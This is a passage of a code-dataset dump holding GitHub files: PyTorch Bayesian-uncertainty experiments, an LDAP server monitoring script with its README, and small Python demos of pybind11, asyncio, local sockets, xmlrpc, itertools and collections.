"text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data as data\nfrom torch.autograd import Variable\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom mcdp.layers.dropout import MCDropout\nfrom mcdp.layers.linear import GaussianLinear\n\n\ndef f(x, train=False):\n if train:\n eps = np.random.normal(0, 0.3, x.shape)\n else:\n eps = 0\n # return x * (np.sin(-2*(x+2) + eps) - x * 4 * np.sin(3*(x+ eps)) + eps - np.cos(3 * x))\n return x * (np.sin(-2*(x+2)) - x * 4 * np.sin(3*(x)) + eps - np.cos(3 * x))\n\nclass PointDataset(data.Dataset):\n def __init__(self):\n super(PointDataset, self).__init__()\n\n train_x = np.random.uniform(-2, -0.5, (2000, 1)).astype('float32')\n train_x3 = np.random.uniform(0.3, 0.7, (1000, 1)).astype('float32')\n train_x2 = np.random.uniform(1.5, 2, (2000, 1)).astype('float32')\n train_x = np.concatenate([train_x, train_x3, train_x2], 0)\n train_y = f(train_x, True).astype('float32')\n\n self.train_x, self.train_y = torch.from_numpy(train_x), torch.from_numpy(train_y)\n\n def __len__(self):\n return self.train_x.size(0)\n\n def __getitem__(self, index):\n return self.train_x[index].view(1), self.train_y[index].view(1)\n\n\nclass Model(nn.Module):\n def __init__(self, l, k, L, activation, p=0.5):\n super(Model, self).__init__()\n\n self.net = nn.Sequential(\n # MCDropout(0.5),\n GaussianLinear(1, k, l),\n activation(),\n MCDropout(p),\n )\n for i in range(L):\n self.net.add_module('({})'.format(i+1),\n nn.Sequential(\n GaussianLinear(k, k, l),\n activation(),\n MCDropout(p),\n ))\n self.net.add_module('{}'.format(L+1), GaussianLinear(k, 1, l))\n\n def forward(self, x):\n return self.net(x)\n\n\ntrue_x = np.linspace(-2, 2, 5000)\ntrue_y = f(true_x)\n\ntrain_dataset = PointDataset()\nloader = data.DataLoader(train_dataset, batch_size=32, shuffle=True)\n\ntest_x = torch.linspace(-4, 4, 400).view(-1, 1)\n\nmodel = Model(5, 1024, 4, nn.ReLU)\nprint(model)\noptimizer = optim.Adam(model.parameters(), weight_decay=25 * 0.5 / 2 / 5000 / 10, amsgrad=True)\ncreterion = nn.MSELoss()\n\nepochs = 10\nbatch_size = 32\n\nfor epoch in range(epochs):\n losses = 0\n for x, y in loader:\n optimizer.zero_grad()\n pred = model(x)\n loss = creterion(pred, y)\n loss.backward()\n optimizer.step()\n losses += loss.item()\n print(epoch, losses / len(loader))\n\n\n\nmodel.eval()\ntmp = []\nfor i in range(10):\n tmp.append(model(test_x))\ntotal = torch.cat(tmp, 1)\ntest_y = total.mean(1)\n\nvar = torch.pow(total, 2).mean(1) - torch.pow(test_y, 2)\nstd = torch.sqrt(var)\n\n# plt.plot(train_dataset.train_x.detach().numpy(), train_dataset.train_y.detach().numpy(), 'gx', linewidth=0.1)\n# plt.plot(true_x, true_y, 'b-')\nplt.plot(test_x.detach().numpy(), test_y.detach().numpy(),'b')\nplt.fill_between(test_x.detach().numpy().reshape(-1), (test_y - 2 * std).detach().numpy(), (test_y + 2 * std).detach().numpy(), alpha=0.2)\nplt.show()\n\n\n\n"
},
{
"alpha_fraction": 0.5114555358886719,
"alphanum_fraction": 0.5336927175521851,
"avg_line_length": 28.65999984741211,
"blob_id": "25574d72ad03ba48a01becd3b5f60dbbab879f31",
"content_id": "0863abaf5caa0f0f2380cd3d31112e3bf8834571",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1484,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 50,
"path": "/mcdp/dataset.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.utils.data as data\n\nclass PointDataset(data.Dataset):\n def __init__(self, N=None, low=-1, high=7, function=torch.sin, noise=False):\n super(PointDataset, self).__init__()\n\n self.N = N\n self.function = function\n\n self.low = low\n self.high = high\n self.noise = noise\n\n # self.xs, self.ys = self.sample()\n self.xs, self.ys = self.reproduce_sample()\n\n def __len__(self):\n return self.xs.size(0)\n\n def __getitem__(self, index):\n assert index <= len(self), 'index range error'\n\n x, y = self.xs[index].view(1), self.ys[index].view(1)\n\n return x, y\n\n def sample(self):\n if self.N is None:\n xs = torch.arange(self.low, self.high, (self.high - self.low) / 140)\n else:\n xs = torch.rand(self.N).uniform_(self.low, self.high)\n ys = self.function(xs)\n\n if self.noise:\n ys += torch.rand(ys.size()).normal_(0, 0.01)\n\n return xs, ys\n\n def reproduce_sample(self):\n if self.N is None:\n xs = torch.arange(self.low, self.high, (self.high - self.low) / 200)\n ys = self.function(xs)\n else:\n xs = torch.FloatTensor([1. * i / (self.N - 5) * 10 - 5 for i in range(self.N - 4)])\n ys = self.function(xs)\n\n xs = torch.FloatTensor(xs.tolist() + [7, 8.5, 10, 11.5])\n ys = torch.FloatTensor(ys.tolist() + [-7, 7, -7, 7])\n return xs, ys\n\n"
},
{
"alpha_fraction": 0.5647754669189453,
"alphanum_fraction": 0.5838107466697693,
"avg_line_length": 33.90967559814453,
"blob_id": "fecc2eac1567848ed2c4edf5c1771207bba38f6c",
"content_id": "1f3f84c1f4a228c23253c5de034a981e700e73d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5411,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 155,
"path": "/bnn_classification.py",
"repo_name": "makora9143/bayes_uncertainty",
"src_encoding": "UTF-8",
"text": "import pickle\nimport math\nimport argparse\n\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data as data\nfrom torchvision import datasets, transforms\nfrom torch.autograd import Variable\n\nfrom tqdm import tqdm\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\n\nfrom mcdp.models import MCLeNet\n\n\n\ndef train(epoch, model, dataloader, creterion, optimizer, use_cuda=False):\n model.predict()\n\n pbar = tqdm(dataloader)\n losses = 0\n pbar.set_description('Epoch {}'.format(epoch))\n for x, y in pbar:\n if use_cuda:\n x, y = x.cuda(), y.cuda()\n x, y = Variable(x), Variable(y)\n optimizer.zero_grad()\n predict = model(x)\n loss = F.nll_loss(predict, y)\n loss.backward()\n optimizer.step()\n losses += loss.data.item()\n pbar.set_postfix(loss=math.exp(loss.data.item()))\n return losses / len(dataloader.dataset)\n\ndef test(model, creterion, dataloader, use_cuda=False):\n # model.mc()\n\n test_loss = 0\n correct = 0\n pbar = tqdm(dataloader)\n for x, y in pbar:\n with torch.no_grad():\n x, y = Variable(x), Variable(y)\n if use_cuda:\n x, y = x.cuda(), y.cuda()\n mean = model(x)\n loss = creterion(mean, y)\n test_loss += math.exp(loss.data.item())\n pbar.set_postfix(loss=math.exp(loss.data.item()))\n pred = mean.data.max(1, keepdim=True)[1] # get the index of the max log-probability\n correct += pred.eq(y.data.view_as(pred)).long().cpu().sum()\n\n test_loss /= len(dataloader.dataset)\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss, correct, len(dataloader.dataset),\n 100. * correct / len(dataloader.dataset)))\n \ndef scatter(output, labels=[1, 5, 7]):\n sample = output.shape[0]\n num_img = output.shape[1]\n x = np.array([list(range(num_img))] * sample).T.reshape(-1)\n # plt.figure(figsize=(12, 9))\n y = output[:, :, 1].T.reshape(-1,)\n plt.scatter(x, y, s=1500, marker='_', alpha=0.3, label='1')\n y = output[:, :, 5].T.reshape(-1,)\n plt.scatter(x, y, s=1000, marker='_', c='orange', alpha=0.3, label='5')\n y = output[:, :, 7].T.reshape(-1,)\n plt.scatter(x, y, s=1000, marker='_', c='green', alpha=0.3, label='7')\n plt.legend(loc='center right')\n plt.savefig('classification_uncertainity.png')\n\ndef main(args):\n\n kwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {}\n train_loader = torch.utils.data.DataLoader(\n datasets.MNIST('~/data/mnist/', train=True, download=False,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.batch_size, shuffle=True, **kwargs)\n\n test_loader = torch.utils.data.DataLoader(\n datasets.MNIST('~/data/mnist/', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.batch_size, shuffle=True, **kwargs)\n\n with open('./test_img.pkl', 'rb') as f:\n data_dict = pickle.load(f)\n\n model = MCLeNet()\n if args.cuda:\n print('use cuda')\n model.cuda()\n\n l2_decay = args.l2 * (1 - args.drop_p) / (2 * args.N)\n print('L2_decay =', l2_decay)\n\n optimizer = optim.SGD(model.parameters(), lr=args.lr, weight_decay=l2_decay)\n\n creterion = nn.NLLLoss()\n\n for epoch in range(1, args.epochs+1):\n losses = train(epoch, model, train_loader, creterion, optimizer, args.cuda)\n test(model, creterion, test_loader, args.cuda)\n\n toy_data = Variable(data_dict['tensor']).cuda() if args.cuda else Variable(data_dict['tensor'])\n model.mc()\n uncertainity = torch.exp(model(toy_data))\n\n scatter(uncertainity.data.cpu().numpy())\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='ArgParser')\n parser.add_argument('--sampling', type=int, default=10,\n help='Number of sampling')\n parser.add_argument('--N', type=int, default=20,\n help='Number of data')\n parser.add_argument('--lr', type=float, default=0.01,\n help='Learning rate')\n parser.add_argument('--batch_size', type=int, default=10,\n help='Batch size')\n parser.add_argument('--epochs', type=int, default=5,\n help='Epoch')\n parser.add_argument('--lam', type=float, default=0.00001,\n help='weight for L2 norm')\n parser.add_argument('--drop_p', type=float, default=0.05,\n help='dropout probability')\n parser.add_argument('--l2', type=float, default=0.1,\n help='data length frequency')\n parser.add_argument('--seed', type=int, default=1234,\n help='Random seed')\n parser.add_argument('--use_cuda', action='store_true', default=False,\n help='disables CUDA training')\n args = parser.parse_args()\n args.cuda = args.use_cuda and torch.cuda.is_available()\n\n torch.manual_seed(args.seed)\n\n if args.cuda:\n torch.cuda.manual_seed(args.seed)\n\n main(args)\n"
}
] | 14 |
Elwell/bdii-monitor | https://github.com/Elwell/bdii-monitor | d1d5406edda464f1ebac42985ae96f126f3a32c3 | cbf4f364d93d7d384c8d6138e30d324f32edd64e | df41bf0ca5d9c6f8acf35ecc55dc73ccabfb2764 | refs/heads/master | 2016-08-13T00:00:56.719972 | 2013-03-05T11:45:01 | 2013-03-05T11:45:01 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6851785182952881,
"alphanum_fraction": 0.6945546269416809,
"avg_line_length": 39.18840408325195,
"blob_id": "51fb77df8f613d9f3b61eb92df4f44e59b0c4234",
"content_id": "a7427c5118f2e32340c97c63990d660d738edd22",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2773,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 69,
"path": "/ldap-gather.py",
"repo_name": "Elwell/bdii-monitor",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\n# Trivial monitoring script to spit out LDAP server performance metrics\n# based on the perl script by Matty < matty91 @ gmail dot com >\n# \n# Licenced under GPL3+\n# Andrew Elwell <[email protected]>\n\nimport ldap\nimport json\nimport argparse\n\n# Usage: ldap-gather.py [ -s server ] [ -p port ] [ -h ] \n# Default to localhost:2170 (normal LDAP users probably want port 387)\nparser = argparse.ArgumentParser(description='Gather LDAP statistics and output as json')\nparser.add_argument('-s', '--server', default='localhost', help='localhost if not specified')\nparser.add_argument('-p', '--port', default=2170, help='2170 if not specified')\nparser.add_argument('-v', '--verbose', help='increase output verbosity', action='store_true')\nargs = parser.parse_args()\n\nif args.verbose:\n print(\"Server: %s Port: %s\\n\" % (args.server, args.port))\n\n\n# Stuff to gather - make tuples of DN dn and attrib to get\nsearchlist = {\n'total_connections':('cn=Total,cn=Connections,cn=Monitor','monitorCounter'),\n'bytes_sent': ('cn=Bytes,cn=Statistics,cn=Monitor','monitorCounter'),\n'completed_operations': ('cn=Operations,cn=Monitor','monitorOpCompleted'),\n'initiated_operations': ('cn=Operations,cn=Monitor','monitorOpInitiated'),\n'referrals_sent': ('cn=Referrals,cn=Statistics,cn=Monitor','monitorCounter'),\n'entries_sent': ('cn=Entries,cn=Statistics,cn=Monitor','monitorCounter'),\n'bind_operations': ('cn=Bind,cn=Operations,cn=Monitor','monitorOpCompleted'),\n'unbind_operations': ('cn=Unbind,cn=Operations,cn=Monitor','monitorOpCompleted'),\n'add_operations': ('cn=Add,cn=Operations,cn=Monitor','monitorOpInitiated'),\n'delete_operations': ('cn=Delete,cn=Operations,cn=Monitor','monitorOpCompleted'),\n'modify_operations': ('cn=Modify,cn=Operations,cn=Monitor','monitorOpCompleted'),\n'compare_operations': ('cn=Compare,cn=Operations,cn=Monitor','monitorOpCompleted'),\n'search_operations': ('cn=Search,cn=Operations,cn=Monitor','monitorOpCompleted'),\n'write_waiters': ('cn=Write,cn=Waiters,cn=Monitor','monitorCounter'),\n'read_waiters': ('cn=Read,cn=Waiters,cn=Monitor','monitorCounter'),\n}\n\n# connect to LDAP server\n\nsummary = {}\n\nconn = ldap.initialize('ldap://%s:%s' % (args.server, args.port))\nconn.simple_bind() # async bind. use simple_bind_s() if you want sync\n\nfor key in searchlist.keys():\n b = searchlist[key][0]\n attr = searchlist[key][1]\n if args.verbose:\n print(\"base: %s Attrib: %s\" % (b,attr))\n\n num = conn.search(b,ldap.SCOPE_BASE,'objectClass=*',[attr,])\n\n try:\n result_type, result_data = conn.result(num, 1)\n # Yes, the nested array is ugly, ugly, ugly. \n if result_type == 101:\n val = int(result_data[0][1].values()[0][0])\n\t summary[key] = val\n \n except:\n print \"oops\"\n\nprint json.dumps(summary)\n"
},
{
"alpha_fraction": 0.646258533000946,
"alphanum_fraction": 0.7026239037513733,
"avg_line_length": 21.369565963745117,
"blob_id": "c877d33ba577f27154d058e8a582ef4b88027d2f",
"content_id": "6a87367543f7d25c8e37ef9dde7a84660924563e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1029,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 46,
"path": "/README.md",
"repo_name": "Elwell/bdii-monitor",
"src_encoding": "UTF-8",
"text": "BDII-Monitor\n============\n\nA trivial set of scripts and utilities to monitor the status of the BDII\nservice[1] used on grid nodes. \n\nSince this is based on openldap, the utilities can be reused for generic LDAP\nmonitoring.\n\n\nGetting Started\n---------------\n\nFirst up, make sure that you enable the built-in monitoring that comes with\nopenldap >= 2.4 - see http://www.openldap.org/doc/admin24/monitoringslapd.html\nfor details.\n\nTo restrict access to the cn=monitor tree, you can either restrict via dn (as\nshown in manpage) or via an IP address range:\n\n````\n database monitor\n access to *\n by peername.ip=128.141.0.0%255.255.0.0 read\n by peername.ip=128.142.0.0%255.255.0.0 read\n by peername.ip=137.138.0.0%255.255.0.0 read\n by * none\n````\n\nJSON Output\n-----------\n\nThe script ldap-gather.py is based on the perl script of the same name \nbut simply outputs json rather than logging to a file. This can then be\nreused by other monitoring scripts\n\n\nLEMON\n-----\n\nTODO - CERN Specific\n\ncollectd\n--------\n\nTODO\n"
}
] | 2 |
binchen15/python-tricks | https://github.com/binchen15/python-tricks | f89283d07d48b9e89074e3b6999d653304b73efd | 84591674c12405f2642d1894eee4882f026a3e76 | d9e89354a0bc62d079298adaeed2890d67e3911e | refs/heads/master | 2022-11-23T18:02:40.263276 | 2020-07-12T21:57:17 | 2020-07-12T21:57:17 | 265,893,992 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6820388436317444,
"alphanum_fraction": 0.6820388436317444,
"avg_line_length": 17.727272033691406,
"blob_id": "5c1c009bc50ec37fe347e521310846d4bcab0ee6",
"content_id": "f1af29f20cd8ed385cc90942902bff7d46f93d0a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 412,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 22,
"path": "/concurrency/async/async_demo3.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "# future can be awaited.\n\n\nimport asyncio\n\n\ndef mark_done(future, result):\n future.set_result(result)\n\n\nasync def main(loop):\n future = asyncio.Future()\n loop.call_soon(mark_done, future, 'result')\n result = await future\n print('returned result: {!r}'.format(result))\n\n\nevent_loop = asyncio.get_event_loop()\ntry:\n event_loop.run_until_complete(main(event_loop))\nfinally:\n event_loop.close()\n"
},
{
"alpha_fraction": 0.5872374773025513,
"alphanum_fraction": 0.625201940536499,
"avg_line_length": 22.320755004882812,
"blob_id": "26af6f9222aa68cbb0fd19beb3719d9057593818",
"content_id": "ea0fb07ffdcad6d0784ee9fae6d03b0ce587f43f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1238,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 53,
"path": "/pybind/README.md",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "### reference:\n\thttp://people.duke.edu/~ccc14/sta-663-2020/notebooks/S13_pybind11.html\n\thttps://pybind11.readthedocs.io/en/stable/index.html\n\n----------- example.cpp ----------------\n```\n#include <pybind11/pybind11.h>\nnamespace py = pybind11;\n\nint add(int i = 1, int j = 2) {\n return i + j;\n}\n\nPYBIND11_MODULE(example, m) {\n m.doc() = \"pybind11 example\"; // optional module docstring\n\n\tm.def(\"add\", &add, \"A function which adds two numbers\",\n py::arg(\"i\") = 1, py::arg(\"j\") = 2);\n}\n```\n----------------------------------------\n\n#### exporting variables from C++\n\n\tpy::object world = py::cast(\"World\");\n\tm.attr(\"what\") = world;\n\n### build manually on linux\n\n\tc++ -O3 -Wall -shared -std=c++11 -fPIC `python3 -m pybind11 --includes` example.cpp -o example`python3-config --extension-suffix`\n\n### build manually on mac\n\n\tc++ -O3 -Wall -shared -std=c++11 -undefined dynamic_lookup `python3 -m pybind11 --includes` example.cpp -o example`python3-config --extension-suffix`\n\n\tnote the '-undefined dynamic_lookup' extra \n\n### to use cppimport \n\nadd \n\n```\n/* \n<%\nsetup_pybind11(cfg)\n%>\n*/\n```\nto the example.cpp code, then directly import\n\n\timport cppimport\n\texample = cppimport.imp('example') ## build once here.\n\texample.add(3, 5)\n\n\n"
},
{
"alpha_fraction": 0.7095761299133301,
"alphanum_fraction": 0.727629542350769,
"avg_line_length": 24.440000534057617,
"blob_id": "478bd7c957e0dab2165a82b537d092251a85940a",
"content_id": "2ae4fb7b814d31e989c0d6fe43d45a993f440a52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1274,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 50,
"path": "/sockets/README.md",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "two primary properties\n\taddress family\n\t\tAF_INET\n\t\tAF_INET6\n\t\tAF_UNIX\n\t\t\tfor Unix Domain Socket (UDS)\n\n\tsocket type\n\t\tSOCK_DGRAM\n\t\t\tUDP\n\t\t\t\tUser Datagram Protocol\n\t\t\tTCP\n\t\t\t\tTransmission Control Protocol\n\t\n\timport socket\n\tsocket.gethostname()\n\tsocket.gethostbyname()\n\tsocket.gethostbyname_ex()\t\n\tsocket.getfqdn()\n\t\thostname, aliases, addresses = \n\tsocket.gethostbyaddr('10.9.0.10')\n\nservice information\n\n\tThe combination of IP address, protocol, and port number uniquely identify a \n\tcommunication channel and ensure that messages sent through a socket arrive \n\tat the correct destination.\n\n\n\tIn [2]: socket.getservbyport(443) Out[2]: 'https'\n\n\nTCP/IP Client and Server\n\n\tstream oriented protocol\n\nUser Datagram Client and server\n\t\n\tmessage oriented protocol\n\n\tUDP messages must fit within a single datagram (for IPv4, \n\tthat means they can only hold 65,507 bytes because the 65,535 byte \n\tpacket also includes header information) and delivery is not \n\tguaranteed as it is with TCP.\n\nUnix Domain Socket\n\n\tthe address of the socket is a path on the file system\n\tthe node created in the file system to represent the socket persists \n\t after the socket is closed, and needs to be removed each time the server starts up\n\n\n"
},
{
"alpha_fraction": 0.7371794581413269,
"alphanum_fraction": 0.7628205418586731,
"avg_line_length": 30.200000762939453,
"blob_id": "5011f5203b32ddd95c6bead325af36c2c7b99d49",
"content_id": "36afcc89ab3925abbf6faa936904ad20f1067af0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 156,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 5,
"path": "/xmlrpc/example2/client.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import xmlrpc.client\n\nproxy = xmlrpc.client.ServerProxy('http://localhost:6789')\n# namespace allowed. concept of service tree\nprint(proxy.dir.list('/tmp'))\n"
},
{
"alpha_fraction": 0.6209476590156555,
"alphanum_fraction": 0.6408977508544922,
"avg_line_length": 22.58823585510254,
"blob_id": "4b9afa76db798bd5979a8925e08502ee99eb39cb",
"content_id": "06846abc4df208d5b0dbdec2fe334b0ad07288b6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 401,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 17,
"path": "/sockets/tcp/client.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import socket\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.connect(('localhost', 10000))\n\nmessage = b'This is the message. It will be echoed from the server.'\n\ntry:\n sock.sendall(message)\n counts = 0\n amount = len(message)\n while counts < amount:\n chunk = sock.recv(16)\n counts += len(chunk)\n print(\"Got {}\".format(chunk))\nfinally:\n sock.close()\n"
},
{
"alpha_fraction": 0.6193474531173706,
"alphanum_fraction": 0.657698929309845,
"avg_line_length": 21.973684310913086,
"blob_id": "0cafe31657cd1efb4494a40bbd9d99d3c61b0c30",
"content_id": "8af51a7a4b947d2b20a2578b90e42a08eae6c50d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1747,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 76,
"path": "/itertools_demo/iter_demo_general.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "# ref: https://pymotw.com/\n\nimport itertools as it\nimport operator as op \n\ndata = [1,2,3,4,5]\nresult = it.accumulate(data, op.mul)\nprint(list(result))\n\ndata = [1,1,2]\nresult = it.combinations(data, 2)\nprint(list(result))\n\n\nresult = it.combinations_with_replacement(data, 2)\nprint(list(result))\n\n# it.cycle\nresult = it.cycle([1,-1])\n\n# chain\n#it.chain(*iterables)\n\n# it.filterfalse(predicate, iterable)\n# return the false ones\n\n# itertools.islice(iterable, start, stop[, step])\n# return an iterable, not copy part of array\nresult = it.islice(range(10), 3)\nprint(list(result))\n\n# itertools.permutations(iterable, r=None)\nresult = it.permutations(range(3), 2)\nprint(list(result))\n\n# product\nresult = it.product(range(3), 'abc')\nprint(list(result))\n\n# repeat(object[, ntimes])\nresult = it.repeat('abc', 3)\nprint(list(result))\n\n# starmap op.mul(*[2,6])\ndata = [(2, 6), (8, 4), (7, 3)]\nresult = it.starmap(op.mul, data)\nfor each in result:\n print(each)\n\n# it.takewhile (only 1 cut)\ndata = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 1]\nresult = it.takewhile(lambda x: x<5, data)\nfor each in result:\n print(each)\n\n# it.dropwhile (only 1 cut)\ndata = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 1]\nresult = it.dropwhile(lambda x: x<5, data)\nfor each in result:\n print(each)\n\n# itertools.tee(iterable, n=2)\n# return n independent iterators for iterable given\ncolors = ['red', 'orange', 'yellow', 'green', 'blue']\nalpha_colors, beta_colors = it.tee(colors)\nfor each in alpha_colors:\n print(each)\nprint('..')\nfor each in beta_colors:\n print(each)\n\n# it.zip_longest(*iterables, fillvalue=None)\ncolors = ['red', 'orange', 'yellow', 'green', 'blue',]\ndata = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10,]\nfor each in it.zip_longest(colors, data, fillvalue=None):\n print(each)\n\n"
},
{
"alpha_fraction": 0.5886426568031311,
"alphanum_fraction": 0.5886426568031311,
"avg_line_length": 23,
"blob_id": "607d0a2e223d92f37314e01919577e5b4bd78290",
"content_id": "b97bb7327937f076515133bea4fe88fb8d84ce8f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 722,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 30,
"path": "/itertools_demo/iter_demo_groupby.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import itertools as it\n\nrobots = [{\n 'name': 'blaster',\n 'faction': 'autobot'\n}, {\n 'name': 'galvatron',\n 'faction': 'decepticon'\n}, {\n 'name': 'jazz',\n 'faction': 'autobot'\n}, {\n 'name': 'metroplex',\n 'faction': 'autobot'\n}, {\n 'name': 'megatron',\n 'faction': 'decepticon'\n}, {\n 'name': 'starcream',\n 'faction': 'decepticon'\n}]\n\nprint(\"before sorting, not you expected:\")\nfor key, grouper in it.groupby(robots, key=lambda x: x['faction']):\n print(f\" {key}=>{list(grouper)}\")\n\nprint(\"after in-place sorting, you get what you want:\")\nrobots.sort(key=lambda x: x['faction'])\nfor key, grouper in it.groupby(robots, key=lambda x: x['faction']):\n print(f\" {key}=>{list(grouper)}\")\n\n\n"
},
{
"alpha_fraction": 0.497854083776474,
"alphanum_fraction": 0.520386278629303,
"avg_line_length": 28.03125,
"blob_id": "cce396774ce09726beb8eebf15abe1f93eb40f0d",
"content_id": "f411d70708e287323842f668e21d1199ba442f53",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 932,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 32,
"path": "/collections_demo/demo_Counter.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "from collections import Counter\n\nc = Counter(\"Hello World!\")\nprint(c)\n\ns = 'the lazy dog jumped over another lazy dog' \nc = Counter(s.split(\" \")) \nprint(c.most_common(3))\nprint(c.most_common()) \n\nc = Counter(a=3,b=5,e=2) \nprint(c.most_common()) \n\nc = Counter({\"a\":3, \"b\":4, \"e\":2}) \nprint(c.most_common()) \nc.elements() \n# <itertools.chain at 0x10e6ac860>\n\nc = Counter(dict([(\"a\",3),(\"b\",4),(\"e\",2)])) # convert from a list of(elem, cnt) \nprint(c)\n\n\nsum(c.values()) # total of all counts \nlist(c) # list unique elements \nset(c) # convert to a set \ndict(c) # convert to a regular dictionary \nc.items() # convert to a list like (elem, cnt) \nc.clear() # reset all counts \n\nc = Counter({\"a\":3, \"b\":4, \"e\":2, \"f\":-2})\nc += Counter() # remove zero and negative counts\nprint(c)\n\n\n\n"
},
{
"alpha_fraction": 0.6647230386734009,
"alphanum_fraction": 0.6763848662376404,
"avg_line_length": 23.5,
"blob_id": "73baba321b5638664b2a9cd9db498a4466733d39",
"content_id": "b2b5473caf1ec24d5d9734a56da695f4642d06a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 343,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 14,
"path": "/xmlrpc/example3/client.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import xmlrpc.client\n\nproxy = xmlrpc.client.ServerProxy('http://localhost:9000')\nprint('public():', proxy.service.public())\n\ntry:\n print('private():', proxy.service.private())\nexcept Exception as err:\n print('\\nERROR:', err)\n\ntry:\n print('public() without prefix:', proxy.public())\nexcept Exception as err:\n print('\\nERROR:', err)\n"
},
{
"alpha_fraction": 0.6375464797019958,
"alphanum_fraction": 0.6710036993026733,
"avg_line_length": 17.482759475708008,
"blob_id": "860d9f5d5ff12286a25330eee6813ab7570ee6e9",
"content_id": "167134cf73c2d1f3c7a18f35192a2d830bb1c9e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 538,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 29,
"path": "/collections_demo/demo_deque.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "# deqeue --- Double-Ended Queue\n\nfrom collections import deque\n\n# .append, .appendleft\n# .extend, .extendleft\n\n# Add to the right\nd1 = deque()\nd1.extend('abcdefg')\nprint('extend :', d1)\nd1.append('h')\nprint('append :', d1)\n\n# Add to the left\nd2 = deque()\nd2.extendleft(range(6))\nprint('extendleft:', d2)\nd2.appendleft(6)\nprint('appendleft:', d2)\n\n# deque can be rotated left, right\nd = collections.deque(range(10))\nd.rotate(2)\nprint('Right rotation:', d)\n\nd = collections.deque(range(10))\nd.rotate(-2)\nprint('Left rotation :', d)\n\n\n"
},
{
"alpha_fraction": 0.6895787119865417,
"alphanum_fraction": 0.7028824687004089,
"avg_line_length": 29,
"blob_id": "9bd186c344342ee48762c8da440b7f23c2214751",
"content_id": "3f1081a530fc41d6b9daac634817a87d911c1aa1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 451,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 15,
"path": "/collections_demo/demo_OrderedDict.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "from collections import OrderedDict\n#dict subclass that remembers the order in which that keys were first inserted.\n\n# order is not sort.\n# it can be used in conjunction with sorting to make a sorted dictionary\n\nd = {'banana': 3, 'apple': 4, 'pear': 1, 'orange': 2}\n\nprint(\"order by name\")\nod = OrderedDict(sorted(d.items(), key=lambda x : x[0]))\nprint(od)\n\nprint('order by values')\nod = OrderedDict(sorted(d.items(), key=lambda x : x[1]))\nprint(od)\n\n"
},
{
